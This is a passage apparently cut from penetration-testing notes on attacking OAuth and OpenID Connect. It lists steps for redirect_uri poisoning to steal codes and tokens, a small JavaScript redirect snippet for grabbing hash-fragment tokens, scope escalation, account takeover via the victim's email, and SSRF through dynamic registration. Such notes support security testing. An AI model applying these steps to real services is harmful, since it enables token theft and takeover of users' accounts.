- 8b. Can add specific parameters
- 8c. Cannot add parameters
- Note: Try using parameter pollution, SSRF/CORS defense bypass techniques, localhost.evil-server.net, etc.
- Step 1: Send malicious url with poisoned redirect_uri parameter
- Step 2: Read code/token in response
- Step 3: Substitute stolen code/token when logging in
- Note: If redirect_uri parameter is sent with code/token, server is likely not vulnerable
- Steal parameter data from hash fragments:
- There are several redirect possibilities:
<script>
if (document.location.hash){
console.log("Hash identified -- redirecting...");
window.location = '/?'+document.location.hash.substr(1);
} else {
console.log("No hash identified in URL");
}
</script>
-
- Upgrade scope to access protected resources (depends on grant type):
- Authorization Code:
- Step 1: Register a malicious application with the OAuth server
- Step 2: Victim approves limited scope
- Step 3: Malicious application sends POST request to /token with expanded scope
- Result: If the OAuth server does not validate the scope with the original request, the access token returned will have an expanded authorization
- Implicit:
- Step 1: Steal access token
- Step 2: Manually send access token with expanded scope
- Result: If the OAuth server does not validate the scope with the original request, the access token returned will have an expanded authorization
- Authorization Code:
- Sign up with victim's email to get account takeover
- Upgrade scope to access protected resources (depends on grant type):
-
Uses JWT (id_token)
-
Keys can be exposed on /.well-known/jwks.json
-
Configuration can be exposed on /.well-known/openid-configuration
-
Can be combined with normal OAuth grant Types EX: response_type=id_token token || response_type=id_token code
-
Step 1: Check for dynamic registration (is some form of authentication required, like a Bearer token?)
-
Step 2: Craft a malicious registration payload for SSRF